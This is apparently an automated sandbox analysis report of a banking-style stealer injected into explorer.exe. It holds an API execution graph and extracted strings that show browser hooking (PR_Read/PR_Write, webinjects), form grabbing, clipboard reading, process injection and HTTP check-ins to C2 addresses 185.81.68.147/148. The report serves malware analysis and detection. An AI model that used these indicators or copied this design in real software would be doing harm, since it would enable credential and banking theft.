                                                                                                                                                                                                                        execution_graph 103907 e11f2c0 103908 e11f2dc __security_init_cookie 103907->103908 103909 e11f36c 103908->103909 103916 e11f336 103908->103916 103919 e11f168 32 API calls 16 library calls 103908->103919 103909->103916 103920 e11c050 103909->103920 103911 e11f38a 103913 e11f3b3 103911->103913 103915 e11c050 _DllMainCRTStartup 87 API calls 103911->103915 103913->103916 103928 e11f168 32 API calls 16 library calls 103913->103928 103917 e11f3a6 103915->103917 103927 e11f168 32 API calls 16 library calls 103917->103927 103919->103909 103921 e11c070 _DllMainCRTStartup 103920->103921 103923 e11c058 _DllMainCRTStartup 103920->103923 103957 e108970 4 API calls 2 library calls 103921->103957 103922 e11c07c 103922->103911 103923->103922 103929 e11be90 103923->103929 103927->103913 103928->103916 103958 e10a4e0 103929->103958 103932 e11bf3d _DllMainCRTStartup 103933 e11bf5b _DllMainCRTStartup 103932->103933 103962 e11ab70 40 API calls 2 library calls 103932->103962 103935 e11bf7b _DllMainCRTStartup 103933->103935 103936 e11bf6f _DllMainCRTStartup 103933->103936 103939 e11bf8f _DllMainCRTStartup 103935->103939 103940 e11bf9e _DllMainCRTStartup 103935->103940 103963 e11a280 75 API calls 2 library calls 103936->103963 103937 e11bee4 _DllMainCRTStartup 103937->103932 103960 e101c60 5 API calls 2 library calls 103937->103960 103964 e11a280 75 API calls 2 library calls 103939->103964 103945 e11bfc1 _DllMainCRTStartup 103940->103945 103946 e11bfb2 _DllMainCRTStartup 103940->103946 103941 e11bf38 103961 e10ab30 29 API calls _DllMainCRTStartup 103941->103961 103948 e11bfd5 _DllMainCRTStartup 103945->103948 103949 e11bfe4 _DllMainCRTStartup 103945->103949 103965 e11a280 75 API calls 2 library calls 103946->103965 103966 e11a280 75 API calls 2 library calls 103948->103966 103951 e11c009 _DllMainCRTStartup 103949->103951 103952 e11bff8 _DllMainCRTStartup 103949->103952 103968 e11e480 IsProcessorFeaturePresent RtlLookupFunctionEntry __crtCapturePreviousContext 103951->103968 103967 e11a280 75 API calls 2 library calls 103952->103967 103955 e11c007 103955->103951 103956 e11c03c 103956->103911 103957->103922 103959 e10a4ec GetModuleFileNameA 103958->103959 103959->103937 103960->103941 103963->103935 103964->103940 103965->103945 103966->103949 103967->103955 103968->103956 104153 dfa17f0 104200 dfa2650 104153->104200 104155 dfa1865 104156 dfa2650 20 API calls 104155->104156 104157 dfa1870 104156->104157 104206 dfbdb7c 104157->104206 104160 dfa1891 lstrcpyA 104161 dfa189d _ld12tod _DllMainCRTStartup 104160->104161 104162 dfa18f7 PathFileExistsA lstrcmpiA 104161->104162 104163 dfa192a lstrcmpiA 104162->104163 104164 dfa19a2 _DllMainCRTStartup 104162->104164 104163->104164 104165 dfa193e lstrcmpiA 104163->104165 104168 dfa19c0 lstrcmpiA 104164->104168 104165->104164 104166 dfa1952 lstrcmpiA 104165->104166 104166->104164 104167 dfa1966 lstrcmpiA 104166->104167 104167->104164 104169 dfa197a lstrcmpiA 104167->104169 104170 dfa19d4 104168->104170 104169->104164 104171 dfa198e lstrcmpiA 104169->104171 104172 dfa19e3 PathFindFileNameW 104170->104172 104173 dfa1a09 _DllMainCRTStartup 104170->104173 104171->104164 104171->104168 104172->104173 104220 dfa2710 104173->104220 104175 dfa1c0c 104227 dfbdb3c 20 API calls 4 library calls 104175->104227 104176 dfa1a21 104176->104175 104177 dfa1a94 104176->104177 104179 dfa1ab5 _ld12tod 104177->104179 104225 dfa17a0 GetNativeSystemInfo _DllMainCRTStartup 104177->104225 104185 dfa1ae8 wsprintfA CreateFileA 104179->104185 104180 dfa1c14 104228 dfbdb3c 20 API calls 4 library calls 104180->104228 104183 dfa1c1c 104229 dfbdb3c 20 API calls 4 library calls 104183->104229 104184 dfa1aa3 104187 dfa1ac2 TerminateProcess 104184->104187 104188 dfa1aa7 104184->104188 104192 dfa1b55 _write_nolock 104185->104192 104187->104179 104226 dfa1370 23 API calls 5 library calls 104188->104226 104189 dfa1c24 104230 dfbdb3c 20 API calls 4 library calls 104189->104230 104194 dfa1b7b lstrlenA 104192->104194 104199 dfa1be8 __termconin _write_nolock 104192->104199 104193 dfa1c2d 104231 dfbe480 104193->104231 104196 dfa1ba4 _write_nolock 104194->104196 104198 dfa1bbf lstrlenA 104196->104198 104197 dfa1c3f 104198->104199 104199->104175 104201 dfa265e 104200->104201 104203 dfa2666 __crtGetLocaleInfoA_stat 104200->104203 104201->104155 104202 dfa269f 104202->104155 104203->104202 104204 dfbdb7c malloc 20 API calls 104203->104204 104205 dfa26c0 __crtGetLocaleInfoA_stat 104204->104205 104205->104155 104207 dfbdc10 104206->104207 104213 dfbdb94 malloc 104206->104213 104243 dfc1098 DecodePointer 104207->104243 104209 dfbdc15 104244 dfbf7c0 20 API calls _getptd_noexit 104209->104244 104214 dfbdbf5 104213->104214 104217 dfbdbfa 104213->104217 104219 dfa187d PathFindFileNameA 104213->104219 104238 dfc0bc4 20 API calls 2 library calls 104213->104238 104239 dfc0c38 20 API calls 7 library calls 104213->104239 104240 dfc1098 DecodePointer 104213->104240 104241 dfbf7c0 20 API calls _getptd_noexit 104214->104241 104242 dfbf7c0 20 API calls _getptd_noexit 104217->104242 104219->104160 104219->104161 104221 dfa2724 __crtCompareStringA_stat 104220->104221 104224 dfa276b __crtCompareStringA_stat 104220->104224 104222 dfa274c 104221->104222 104223 dfbdb7c malloc 20 API calls 104221->104223 104222->104176 104223->104224 104224->104176 104225->104184 104226->104179 104227->104180 104228->104183 104229->104189 104230->104193 104232 dfbe489 104231->104232 104233 dfbe494 104232->104233 104234 dfbe624 IsProcessorFeaturePresent 104232->104234 104233->104197 104235 dfbe63b 104234->104235 104245 dfc51e4 RtlLookupFunctionEntry __crtCapturePreviousContext 104235->104245 104237 dfbe64e 104237->104197 104238->104213 104239->104213 104240->104213 104241->104217 104242->104219 104243->104209 104244->104219 104245->104237 104246 dfa85f0 104251 dfa8400 104246->104251 104248 dfa8673 104249 dfa861c __termconin _DllMainCRTStartup 104249->104248 104257 dfa89f0 IsProcessorFeaturePresent RtlLookupFunctionEntry _ld12tod _DllMainCRTStartup 104249->104257 104256 dfa8426 malloc _CRT_INIT realloc _DllMainCRTStartup 104251->104256 104252 dfa84fd __termconin 104253 dfbe480 _ld12tod 2 API calls 104252->104253 104254 dfa8513 104253->104254 104254->104249 104255 dfa84e0 Thread32Next 104255->104252 104255->104256 104256->104252 104256->104255 104257->104249 104258 dfa86a0 104270 dfa83b0 104258->104270 104260 dfa874b _DllMainCRTStartup 104261 dfbe480 _ld12tod 2 API calls 104260->104261 104262 dfa8822 104261->104262 104263 dfa86ca _DllMainCRTStartup 104263->104260 104275 dfa8bb0 IsProcessorFeaturePresent RtlLookupFunctionEntry _ld12tod _DllMainCRTStartup 104263->104275 104265 dfa8732 104266 dfa87e5 104265->104266 104268 dfa873a _DllMainCRTStartup 104265->104268 104277 dfa75e0 VirtualFree VirtualFree 104266->104277 104268->104260 104276 dfa75e0 VirtualFree VirtualFree 104268->104276 104271 dfa83f1 104270->104271 104272 dfa83cd Sleep 104270->104272 104271->104263 104272->104271 104275->104265 104276->104260 104277->104260 104278 dfb7f00 104290 dfb8550 104278->104290 104281 dfa2c10 29 API calls _DllMainCRTStartup 104288 dfb7f68 _DllMainCRTStartup 104281->104288 104282 dfb8650 21 API calls 104282->104288 104283 dfa2c10 29 API calls _DllMainCRTStartup 104286 dfb7f2a _DllMainCRTStartup 104283->104286 104284 dfa1100 21 API calls _DllMainCRTStartup 104284->104288 104285 dfb85e0 21 API calls 104285->104286 104286->104283 104286->104285 104287 dfb845b Sleep 104286->104287 104286->104288 104301 dfb84b0 OpenClipboard 104286->104301 104287->104286 104288->104281 104288->104282 104288->104284 104288->104286 104288->104287 104289 dfb86a0 7 API calls 104288->104289 104289->104288 104312 dfb8480 104290->104312 104293 dfb8480 GetProcAddress 104294 dfb8581 104293->104294 104295 dfb8480 GetProcAddress 104294->104295 104296 dfb859b 104295->104296 104297 dfb8480 GetProcAddress 104296->104297 104298 dfb85b5 104297->104298 104299 dfb8480 GetProcAddress 104298->104299 104300 dfb85cf 104299->104300 104300->104286 104302 dfb84cb GetClipboardData 104301->104302 104303 dfb8524 104301->104303 104304 dfb84fb CloseClipboard 104302->104304 104305 dfb84e1 GlobalLock 104302->104305 104317 dfa2c10 104303->104317 104304->104303 104308 dfb850b 104304->104308 104305->104304 104307 dfb84ef GlobalUnlock 104305->104307 104307->104304 104316 dfa1100 21 API calls _DllMainCRTStartup 104308->104316 104311 dfb8516 104311->104286 104313 dfb848f _DllMainCRTStartup 104312->104313 104314 dfb84a6 104313->104314 104315 dfb8494 GetProcAddress 104313->104315 104314->104293 104315->104314 104316->104311 104318 dfa2c2d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 104317->104318 104321 dfa2070 104318->104321 104320 dfa2c64 104320->104286 104322 dfa2099 _DllMainCRTStartup 104321->104322 104323 dfa20a2 _DllMainCRTStartup 104322->104323 104324 dfa2136 104322->104324 104327 dfa20dc 104323->104327 104328 dfa20c4 104323->104328 104338 dfa2030 21 API calls _DllMainCRTStartup 104324->104338 104337 dfa1e80 21 API calls _DllMainCRTStartup 104327->104337 104335 dfa23e0 29 API calls 2 library calls 104328->104335 104331 dfa20cd 104336 dfa2360 29 API calls 2 library calls 104331->104336 104333 dfa20da 104334 dfa20e7 char_traits _DllMainCRTStartup 104333->104334 104334->104320 104335->104331 104336->104333 104337->104334 104339 dfbf2c0 104341 dfbf2dc __security_init_cookie 104339->104341 104340 dfbf36c 104349 dfbf336 104340->104349 104352 dfbc050 104340->104352 104341->104340 104341->104349 104351 dfbf168 32 API calls 15 library calls 104341->104351 104343 dfbf38a 104344 dfbf3b3 104343->104344 104346 dfbc050 _DllMainCRTStartup 88 API calls 104343->104346 104344->104349 104360 dfbf168 32 API calls 15 library calls 104344->104360 104348 dfbf3a6 104346->104348 104359 dfbf168 32 API calls 15 library calls 104348->104359 104351->104340 104354 dfbc058 _DllMainCRTStartup 104352->104354 104355 dfbc070 _DllMainCRTStartup 104352->104355 104353 dfbc07c 104353->104343 104354->104353 104361 dfbbe90 104354->104361 104389 dfa8970 4 API calls 2 library calls 104355->104389 104359->104344 104360->104349 104390 dfaa4e0 104361->104390 104364 dfbbf5b _DllMainCRTStartup 104367 dfbbf7b _DllMainCRTStartup 104364->104367 104368 dfbbf6f _DllMainCRTStartup 104364->104368 104365 dfbbf3d _DllMainCRTStartup 104365->104364 104406 dfbab70 40 API calls 2 library calls 104365->104406 104371 dfbbf8f _DllMainCRTStartup 104367->104371 104372 dfbbf9e _DllMainCRTStartup 104367->104372 104407 dfba280 75 API calls 2 library calls 104368->104407 104369 dfbbee4 _DllMainCRTStartup 104369->104365 104392 dfa1c60 104369->104392 104408 dfba280 75 API calls 2 library calls 104371->104408 104377 dfbbfb2 _DllMainCRTStartup 104372->104377 104378 dfbbfc1 _DllMainCRTStartup 104372->104378 104409 dfba280 75 API calls 2 library calls 104377->104409 104379 dfbbfd5 _DllMainCRTStartup 104378->104379 104380 dfbbfe4 _DllMainCRTStartup 104378->104380 104410 dfba280 75 API calls 2 library calls 104379->104410 104383 dfbc009 _DllMainCRTStartup 104380->104383 104384 dfbbff8 _DllMainCRTStartup 104380->104384 104386 dfbe480 _ld12tod 2 API calls 104383->104386 104411 dfba280 75 API calls 2 library calls 104384->104411 104387 dfbc03c 104386->104387 104387->104343 104388 dfbc007 104388->104383 104389->104353 104391 dfaa4ec GetModuleFileNameA 104390->104391 104391->104369 104412 dfa9d80 104392->104412 104396 dfa1c9b _DllMainCRTStartup 104419 dfa8900 104396->104419 104398 dfa1cb8 _DllMainCRTStartup 104399 dfbe480 _ld12tod 2 API calls 104398->104399 104400 dfa1d13 104399->104400 104401 dfaab30 104400->104401 104427 dfaa990 104401->104427 104407->104367 104408->104372 104409->104378 104410->104380 104411->104388 104422 dfa9c50 104412->104422 104414 dfa9dd4 _DllMainCRTStartup 104415 dfbe480 _ld12tod 2 API calls 104414->104415 104416 dfa1c83 104415->104416 104417 dfaa1b0 CreateFileW 104416->104417 104418 dfaa1f3 6 library calls 104417->104418 104418->104396 104420 dfa83b0 _DllMainCRTStartup Sleep 104419->104420 104421 dfa890d _DllMainCRTStartup 104420->104421 104421->104398 104423 dfa9ca9 _DllMainCRTStartup 104422->104423 104424 dfa9d37 wsprintfW 104423->104424 104425 dfbe480 _ld12tod 2 API calls 104424->104425 104426 dfa9d6b 104425->104426 104426->104414 104428 dfaa9d5 _ld12tod 104427->104428 104429 dfaaa3d GetUserNameW GetComputerNameW 104428->104429 104449 dfaa350 104429->104449 104431 dfaaa75 104432 dfaa350 _DllMainCRTStartup malloc 104431->104432 104433 dfaaa84 _DllMainCRTStartup 104432->104433 104455 dfa8fa0 104433->104455 104435 dfaaafe _DllMainCRTStartup 104436 dfbe480 _ld12tod 2 API calls 104435->104436 104437 dfaab16 104436->104437 104438 dfaa510 104437->104438 104439 dfaa540 _DllMainCRTStartup 104438->104439 104440 dfa8fa0 _DllMainCRTStartup 21 API calls 104439->104440 104441 dfaa581 _DllMainCRTStartup 104440->104441 104442 dfaa5a5 _DllMainCRTStartup 104441->104442 104443 dfaa5b0 StrChrA 104441->104443 104444 dfaa5a0 104441->104444 104446 dfaa61b SleepEx 104442->104446 104447 dfaa5d1 _DllMainCRTStartup 104443->104447 104445 dfaa990 _DllMainCRTStartup 24 API calls 104444->104445 104445->104442 104447->104442 104447->104443 104512 dfaa880 104447->104512 104450 dfaa35e 104449->104450 104451 dfaa366 _DllMainCRTStartup 104449->104451 104450->104431 104452 dfaa39f 104451->104452 104453 dfaa3b1 malloc 104451->104453 104452->104431 104454 dfaa3c8 _DllMainCRTStartup 104453->104454 104454->104431 104456 dfa90df _mtinitlocknum _DllMainCRTStartup 104455->104456 104457 dfa8fdd __lock_fhandle _DllMainCRTStartup 104455->104457 104469 dfa6e10 104456->104469 104505 dfa9b30 104457->104505 104460 dfa9141 _DllMainCRTStartup 104461 dfa917a _DllMainCRTStartup 104460->104461 104463 dfa6e10 _DllMainCRTStartup 20 API calls 104460->104463 104462 dfbe480 _ld12tod 2 API calls 104461->104462 104464 dfa91b4 104462->104464 104463->104460 104464->104435 104465 dfa903c _DllMainCRTStartup 104466 dfa6e10 _DllMainCRTStartup 20 API calls 104465->104466 104467 dfa90ac _DllMainCRTStartup 104466->104467 104467->104456 104468 dfa6e10 _DllMainCRTStartup 20 API calls 104467->104468 104468->104467 104470 dfa6e53 _ld12tod _DllMainCRTStartup 104469->104470 104471 dfa6f6c WSAStartup 104470->104471 104472 dfa6f84 socket 104471->104472 104496 dfa73e4 _DllMainCRTStartup 104471->104496 104473 dfa6fa5 gethostbyname 104472->104473 104472->104496 104477 dfa6fb8 _DllMainCRTStartup 104473->104477 104473->104496 104474 dfa741b closesocket WSACleanup 104475 dfbe480 _ld12tod 2 API calls 104474->104475 104476 dfa7464 104475->104476 104476->104460 104478 dfa700b send 104477->104478 104477->104496 104479 dfa7029 104478->104479 104478->104496 104480 dfa7032 send 104479->104480 104494 dfa704a _ld12tod _DllMainCRTStartup 104479->104494 104480->104494 104480->104496 104481 dfa7090 recv 104481->104494 104481->104496 104482 dfa7475 104511 dfbe6f8 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 104482->104511 104484 dfa747a 104485 dfa71e9 104486 dfa71f2 104485->104486 104487 dfa739c 104485->104487 104488 dfa7204 malloc 104485->104488 104489 dfa71fa 104486->104489 104486->104496 104491 dfa73ec malloc 104487->104491 104492 dfa73a1 malloc 104487->104492 104490 dfa7240 recv 104488->104490 104489->104488 104490->104496 104503 dfa7265 _DllMainCRTStartup 104490->104503 104491->104474 104493 dfa73c0 recv 104492->104493 104495 dfa73dd 104493->104495 104493->104496 104494->104481 104494->104482 104494->104485 104494->104496 104495->104493 104495->104496 104496->104474 104497 dfa746f 104510 dfbe6f8 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 104497->104510 104499 dfa7474 104499->104482 104500 dfa7380 104500->104474 104500->104496 104501 dfa72ea realloc 104501->104503 104502 dfa7310 recv 104502->104496 104502->104503 104503->104490 104503->104496 104503->104497 104503->104500 104503->104501 104503->104502 104504 dfa733a recv 104503->104504 104504->104496 104504->104503 104506 dfa9b82 _DllMainCRTStartup 104505->104506 104507 dfa9c0a wsprintfA 104506->104507 104508 dfbe480 _ld12tod 2 API calls 104507->104508 104509 dfa9c3b 104508->104509 104509->104465 104510->104499 104511->104484 104513 dfaa941 _ld12tod 104512->104513 104517 dfaa8a6 _ld12tod 104512->104517 104516 dfaa620 _DllMainCRTStartup 22 API calls 104513->104516 104514 dfaa93f _DllMainCRTStartup 104515 dfbe480 _ld12tod 2 API calls 104514->104515 104518 dfaa97c 104515->104518 104516->104514 104517->104514 104523 dfaa620 104517->104523 104518->104447 104524 dfaa667 _ld12tod _DllMainCRTStartup 104523->104524 104525 dfaa6c8 InternetCrackUrlA 104524->104525 104528 dfaa6e5 _ld12tod 104525->104528 104530 dfaa812 _DllMainCRTStartup 104525->104530 104526 dfbe480 _ld12tod 2 API calls 104527 dfaa866 104526->104527 104527->104514 104533 dfa9e70 104527->104533 104529 dfa6e10 _DllMainCRTStartup 20 API calls 104528->104529 104528->104530 104531 dfaa72b _DllMainCRTStartup 104529->104531 104530->104526 104531->104530 104532 dfaa819 ShellExecuteA 104531->104532 104532->104530 104534 dfa9b30 _DllMainCRTStartup 3 API calls 104533->104534 104535 dfa9eb2 _DllMainCRTStartup 104534->104535 104536 dfbe480 _ld12tod 2 API calls 104535->104536 104537 dfa9f3b DeleteFileA CopyFileA 104536->104537 104537->104514

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 0DFA50E0 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                        • API String ID: 2683923594-1492645186
                                                                                                                                                                                                                        • Opcode ID: 6e83c18cb002955bb26f9b6f7c36290ec2a8941a198f841374d651a1270a6e4b
                                                                                                                                                                                                                        • Instruction ID: fb284081fc6f7cba534b6350a69a609dff91713a19ab959bb22cc7f738072d09
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e83c18cb002955bb26f9b6f7c36290ec2a8941a198f841374d651a1270a6e4b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD030878602F5295EB819BD2F89436A33AAF749B91F549237C84F43734EF788198C760
                                                                                                                                                                                                                        Function 0DFA17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction ID: c41652eda50af808271b44e9091511fcc463b333d1a486420e52dcfe7e684f53
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 436ec732c42793a806276a19a56ba1830d7ca16e63bd2a4968167b4ceaee4000
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30C14F76604B4696EB10DF6AFC583AD77A6F789B88F448126DE4B47B18DF38C109CB10
                                                                                                                                                                                                                        Function 0DFA6E10 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 432 dfa6e10-dfa6ed4 call dfaa4e0 call dfe07c0 call dfe07c8 * 5 447 dfa6f30-dfa6f7e call dfe07c8 WSAStartup 432->447 448 dfa6ed6-dfa6eda 432->448 454 dfa6f84-dfa6f9f socket 447->454 455 dfa7405 447->455 448->447 450 dfa6edc-dfa6f2a call dfe07c8 call dfe0738 call dfe07c8 * 2 448->450 450->447 457 dfa740c 454->457 458 dfa6fa5-dfa6fb2 gethostbyname 454->458 455->457 461 dfa740f-dfa7415 call dfe0750 457->461 458->457 460 dfa6fb8-dfa6ff8 call dfe0800 call dfe0850 call dfe0858 458->460 460->457 475 dfa6ffe-dfa7023 call dfe07a8 send 460->475 465 dfa741b-dfa746e closesocket WSACleanup call dfbe480 461->465 475->457 478 dfa7029-dfa7030 475->478 479 dfa704a-dfa7081 call dfaa4e0 478->479 480 dfa7032-dfa7044 send 478->480 483 dfa7090-dfa70ab recv 479->483 480->457 480->479 483->457 484 dfa70b1-dfa70b4 483->484 485 dfa71ca-dfa71d9 484->485 486 dfa70ba-dfa70c3 484->486 485->457 487 dfa71df-dfa71e4 485->487 486->485 488 dfa70c9-dfa70d2 486->488 487->483 488->485 489 dfa70d8-dfa70df 488->489 490 dfa7475-dfa747a call dfbe6f8 489->490 491 dfa70e5-dfa70f3 489->491 492 dfa711a-dfa712f call dfe07a8 491->492 493 dfa70f5-dfa710b call dfe0808 491->493 501 dfa71e9-dfa71f0 492->501 502 dfa7135-dfa714b call dfe0818 492->502 493->457 500 dfa7111-dfa7115 493->500 503 dfa71c6 500->503 505 dfa71fc-dfa71fe 501->505 506 dfa71f2-dfa71f4 501->506 514 dfa714d-dfa7166 call dfe0808 502->514 515 dfa71c4 502->515 503->485 507 dfa739c-dfa739f 505->507 508 dfa7204-dfa7238 malloc 505->508 506->457 510 dfa71fa 506->510 512 dfa73ec-dfa7403 malloc 507->512 513 dfa73a1-dfa73bc malloc 507->513 511 dfa7240-dfa725f recv 508->511 510->508 511->461 516 dfa7265-dfa7267 511->516 512->465 517 dfa73c0-dfa73db recv 513->517 526 dfa7168-dfa7186 call dfe0828 514->526 527 dfa718e-dfa71a0 call dfe0808 514->527 515->503 519 dfa736e-dfa7370 516->519 520 dfa726d-dfa7275 516->520 517->457 521 dfa73dd-dfa73e2 517->521 523 dfa7373-dfa737a 519->523 520->519 524 dfa727b-dfa7283 520->524 521->517 525 dfa73e4-dfa73ea 521->525 523->511 529 dfa7380 523->529 524->519 530 dfa7289-dfa7290 524->530 525->465 526->457 536 dfa718c 526->536 527->515 538 dfa71a2-dfa71c0 call dfe0808 527->538 529->461 534 dfa746f-dfa7474 call dfbe6f8 530->534 535 dfa7296-dfa72c8 call dfe0828 530->535 534->490 535->461 544 dfa72ce-dfa72d0 535->544 536->515 538->515 544->461 545 dfa72d6 544->545 546 dfa72dc-dfa72e8 545->546 547 dfa7385-dfa7397 545->547 548 dfa72ea-dfa72fe realloc 546->548 549 dfa7302-dfa7308 546->549 547->465 548->549 550 dfa7310-dfa732e recv 549->550 550->461 551 dfa7334-dfa7338 550->551 551->550 552 dfa733a-dfa7353 recv 551->552 552->461 553 dfa7359-dfa736c 552->553 553->523
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
